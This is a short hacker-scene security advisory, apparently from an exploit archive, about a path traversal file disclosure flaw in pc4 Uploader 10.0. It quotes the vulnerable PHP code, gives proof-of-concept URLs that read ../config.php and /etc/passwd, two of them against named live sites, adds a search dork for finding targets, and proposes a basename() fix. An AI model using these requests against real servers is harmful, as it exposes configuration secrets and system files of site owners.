|| || | || o_,_7 _|| . _o_7 _|| q_|_|| o_\\\_, ( : / (_) / ( . ___________________ _/QQQQQQQQQQQQQQQQQQQ\__ __/QQQ/````````````````\QQQ\___ _/QQQQQ/ \QQQQQQ\ /QQQQ/`` ```QQQQ\ /QQQQ/ Advisory \QQQQ\ |QQQQ/ By Qabandi \QQQQ| |QQQQ| |QQQQ| |QQQQ| From Kuwait, PEACE... |QQQQ| |QQQQ| |QQQQ| |QQQQ\ iqa[a]hotmail.fr /QQQQ| \QQQQ\ __ /QQQQ/ \QQQQ\ /QQ\_QQQQ/ \QQQQ\ \QQQQQQQ/ \QQQQQ\ /QQQQQ/_ ``\QQQQQ\_____________/QQQ/\QQQQ\_ ``\QQQQQQQQQQQQQQQQQQQ/ `\QQQQ\ ``````````````````` ````` =Vuln: pc4arb - pc4 Uploader <= 10.0 Remote File Disclosure Vulnerability =INFO: http://pc4arb.com/article-48.html =BUY: ~~~ =Download: ~~~ =DORK: intext:"Pictures of Whale Penis" ____________ _-=/:Conditions:\=-_ ```````````````````````````````````````````````````````````````````````````````` none ---------------------------------------===-------------------------------------- _________________ _-=/:Vulnerable_Code:\=-_ ```````````````````````````````````````````````````````````````````````````````` // in "./pc4uploader/upfiles/index.php" function displayimage( $fn, $lastMod, $fs ) { global $out_Types; $ext = explode( ".", $fn ); $ext_i = count( $ext ) - 1; $file_ext = $ext[$ext_i]; header( "Last-Modified: ".$lastMod ); header( "ETag: ".getetag( $fn ) ); header( "Accept-Ranges: bytes" ); header( "Content-Length: ".$fs ); header( "Content-Type: ".$out_Types[$file_ext] ); $fp = fopen( $fn, "rb" ); <-----------------------------//opens $fn with no filtering or precautions taken if ( function_exists( fpassthru ) ) { fpassthru( $fp ); } else { $temp = fread( $fp, $fs ); echo $temp; } fclose( $fp ); return; } // Function displayimage() is later called $file = $_GET['file']; <---------------------------------// again, not filtered or anything. //.. //.. //.. //.. displayimage( $file, "Thu, 01 Jan 2006 12:00:00 GMT", $fs ); ---------------------------------------===-------------------------------------- _______ _-=/:P.o.C:\=-_ ```````````````````````````````````````````````````````````````````````````````` http://localhost/pc4uploader/upfiles/index.php?file=../config.php http://localhost/pc4uploader/upfiles/index.php?file=/etc/passwd demo: http://upload.traidnt.net/upfiles/index.php?file=../config.php {Save File to view the code if needed} http://uploader.pc4arb.com/upfiles/index.php?file=../config.php {view source} ---------------------------------------===-------------------------------------- __________ _-=/:SOLUTION:\=-_ ```````````````````````````````````````````````````````````````````````````````` //Use this displayimage() function instead, notice the changes.. function displayimage( $fn, $lastMod, $fs ) { global $out_Types; $fn = basename($fn); $ext = explode( ".", $fn ); $ext_i = count( $ext ) - 1; $file_ext = $ext[$ext_i]; header( "Last-Modified: ".$lastMod ); header( "ETag: ".getetag( $fn ) ); header( "Accept-Ranges: bytes" ); header( "Content-Length: ".$fs ); header( "Content-Type: ".$out_Types[$file_ext] ); $fp = fopen( $fn, "rb" ); if ( function_exists( fpassthru ) ) { fpassthru( $fp ); } else { $temp = fread( $fp, $fs ); echo $temp; } fclose( $fp ); return; } //I added $fn = basename($fn);, it will convert anything like "../../config.php" to "config.php" // since config.php doesent exist the script will do the rest by giving a safe error, // also move ./include/default.gif to ./upfiles/default.gif // everything should be good :) ---------------------------------------===-------------------------------------- ______________________________________________________________________________ / \ | Tem al-tableegh 3an el-thaghra min sinat yaddi | \______________________________________________________________________________/ \ No More Private / ````````````````` Salamz to All Muslim Hackers.